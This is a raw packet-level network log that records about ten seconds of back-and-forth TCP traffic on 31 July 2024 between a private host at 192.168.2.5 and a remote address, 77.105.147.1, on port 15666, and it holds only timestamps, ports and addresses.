Jul 31, 2024 18:28:07.770714998 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.770781040 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.818871975 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.818947077 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.867050886 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.867120981 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:07.924123049 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:07.924175024 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.378865004 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.410104990 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.410187006 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.419292927 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.420080900 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.420156002 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.470710993 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.470767975 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.522888899 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.523000956 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.578833103 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.578906059 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.630764008 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.630853891 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.678689003 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.678745031 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:08.727185965 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:08.727251053 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.065973043 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.208009005 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.208093882 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.218009949 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.218266964 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.218336105 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.266851902 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.266916990 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.314764977 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.316421986 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.366827011 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.368424892 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.418718100 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.420409918 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.466784000 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.468425989 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.514755964 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.516410112 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.562844038 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.564450026 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.622728109 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.624411106 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.674746990 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.675345898 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.722826958 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.724411011 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.770972967 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.771056890 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.866830111 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.866944075 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:09.935262918 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:09.936408043 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.059623957 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.059675932 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.106745958 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.108433962 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.154802084 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.155019045 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.209012032 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.209089994 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.254841089 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.256488085 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.306807995 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.306893110 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.354748011 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.354852915 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.407083035 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.407157898 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.458745956 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.458822966 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.511092901 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.511200905 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.558742046 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.558828115 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.606693029 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.606801987 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.654787064 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.654891968 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.706809044 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.706873894 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.758642912 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.758737087 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.823348999 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.823422909 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.880814075 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.880908012 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.930716038 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.930787086 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:10.983062029 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:10.983123064 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.031872034 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.031939030 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.079941034 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.080013037 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.127465963 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.127640963 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.185633898 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.185688972 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.248193026 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.248269081 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.299840927 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.299925089 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.350975990 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.351090908 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.399825096 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.399903059 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.542350054 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.542463064 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.620243073 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.620312929 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.674602985 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.674700975 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.723229885 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.723309994 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.770714998 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.770793915 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.822832108 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.822907925 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.870769024 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.870865107 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.918714046 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.918782949 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:11.967021942 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:11.967117071 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.018726110 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.018806934 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.066704035 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.066785097 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.118884087 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.118988991 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.166714907 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.166774035 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.218704939 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.218770981 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.274394035 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.274471045 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.325766087 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.325853109 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.375885010 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.375961065 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.422732115 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.422826052 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.470741034 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.470818996 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.518737078 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.518810987 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.566762924 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.566831112 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.618998051 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.619088888 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.670795918 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.670957088 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.718853951 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.718916893 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.766829967 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.766899109 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.819094896 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.819144964 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.870634079 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.870713949 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:12.919023037 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:12.919251919 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.029254913 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.029386044 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.074707985 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.074791908 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.126735926 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.126827955 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.176433086 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.176518917 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.230829954 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.230906963 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.282829046 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.282937050 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.376852989 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:13.376949072 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:13.862885952 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.009321928 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.009418964 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.019973040 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.022762060 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.022838116 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.071024895 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.071185112 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.122726917 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.122869015 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.174803019 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.174957991 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.222765923 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.222877026 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.270953894 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.271050930 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.318859100 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.326176882 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.374859095 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.374982119 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.422734022 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.422811031 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.500834942 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.500896931 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.546758890 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.546861887 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.594782114 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.594841003 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.646873951 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.646943092 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.694880962 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.695000887 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.743756056 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.743887901 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.794917107 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.795037031 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.847407103 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.847507000 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.898756981 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.898830891 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.946850061 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.946944952 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:14.994942904 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:14.995076895 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.050697088 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.050806046 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.098751068 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.098843098 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.142748117 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.142818928 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.195051908 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.195137024 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.246907949 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.247006893 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.298839092 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.299001932 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.346698046 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.346786022 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.398654938 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.398752928 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.446809053 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.446887970 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.496936083 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.497014046 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.548856020 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.548963070 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.598853111 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.598948002 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.646737099 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.646821976 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.694789886 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.694858074 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.747036934 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.747122049 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.801460981 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.801563025 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.847189903 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.847266912 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.894761086 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.894836903 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.947279930 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.947381020 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:15.996074915 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:15.996146917 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.042840004 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.043056011 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.094822884 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.094888926 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.142641068 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.142719030 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.190845966 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.190922976 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.242785931 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.242841959 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.294686079 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.294815063 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.342868090 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.342950106 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.395477057 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.395551920 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.442694902 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.442775011 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.494792938 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.494873047 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.542766094 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.542877913 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.590783119 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.590832949 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.639213085 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.639266968 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.686851025 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:16.686944962 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:16.987776995 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.014183998 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.014244080 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.020097017 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.020471096 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.020519018 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.067059040 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.067141056 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.115118980 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.115196943 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.163050890 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.163125992 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.214996099 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.215126038 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.263266087 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.263323069 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.312642097 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.316395998 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.364430904 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.368398905 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.414757967 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.416400909 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.462816000 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.464411020 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.516680956 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.516777992 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.578838110 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.579076052 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.630956888 CEST	15666	49704	77.105.147.1	192.168.2.5
Jul 31, 2024 18:28:17.631015062 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:17.940905094 CEST	49704	15666	192.168.2.5	77.105.147.1
Jul 31, 2024 18:28:18.233270884 CEST	15666	49704	77.105.147.1	192.168.2.5
